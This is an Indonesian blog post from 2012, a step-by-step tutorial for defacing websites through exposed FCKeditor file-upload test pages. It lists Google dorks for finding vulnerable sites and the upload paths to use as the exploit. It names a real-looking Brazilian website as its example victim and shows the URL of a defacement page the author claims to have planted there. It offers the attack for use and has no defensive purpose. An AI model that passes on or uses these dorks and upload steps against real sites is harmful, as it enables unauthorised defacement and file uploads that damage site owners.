Minggu, 26 Agustus 2012

Deface dengan metode FCKeditor

8/26/2012  ,  Tidak ada komentar


hmmm,kali ini akyra akan posting tentang deface web dengan metode FCKeditor

 Dorknya:coba2 aja...
- inurl:/editor/editor/filemanager/

- inurl:/HTMLEditor/editor/"
- inurl:/HTMLEditor/editor//filemanager/
- inurl:/HTMLEditor/editor/filemanager/connectors/

Exploit:http://[target.com]/editor/editor/filemanager/upload/test.html
             http://[Target.com]/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html


dork diatas ^ isi kan d google, cari trget...klo dapat

ex: http://www.centerkennedy.com.br/moveiseletro/editor/editor/filemanager/

inject kn exploit ny d atas....
jdinya.......
ex : http://www.centerkennedy.com.br/moveiseletro/editor/editor/filemanager/upload/test.html

pada [Select the "File Uploader" to use: ] <----- pilih PHP

terus upload html kmu.....
klik send it to server, kalo sukses or terupload maka pada kotak [Uploaded File URL:] akan memberikan patch dimana file kamu terupload

ex : yang keluar pada kotak [Uploaded File URL:] : /UserFiles/html_kamu.html

maka hasil nya ada di http://[target.com]/editor/html_kamu.html
mudah kn....hehehehehe
nih,hasil pepes ane :D
http://www.centerkennedy.com.br/editor/images/anon_knight.html

sumber : Hacker Indonesia

0 komentar:

Posting Komentar

simple

simple

tam hu

free counters
DON'T FORGET FOLLOW ME AND LEAVE YOUR COMMENT!